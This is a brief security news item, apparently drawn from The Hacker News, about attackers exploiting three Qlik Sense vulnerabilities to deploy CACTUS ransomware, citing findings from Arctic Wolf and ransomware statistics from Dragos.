Qlik Sense flaws leveraged in new CACTUS ransomware attacks

Vulnerabilities impacting cloud analytics and business intelligence software Qlik Sense have been exploited to facilitate the deployment of CACTUS ransomware in a new campaign, The Hacker News reports. After the successful exploitation of the critical HTTP request tunneling and unauthenticated remote code execution vulnerabilities, tracked as CVE-2023-41265 and CVE-2023-48365, respectively, as well as the medium-severity path traversal flaw, tracked as CVE-2023-41226, threat actors behind the campaign proceed to leverage the Qlik Sense Scheduler service to download more remote monitoring tools, according to a report from Arctic Wolf. Attackers have also gone to remove installed Sophos software and replace admin account credentials while establishing an RDP tunnel before distributing CACTUS ransomware. Such findings come amid the increasing prevalence and sophistication of the ransomware landscape, with Dragos noting that ransomware attacks totaled 318 across all industries in October alone, compared with 253 and 231 attacks in the second and third quarters of this year.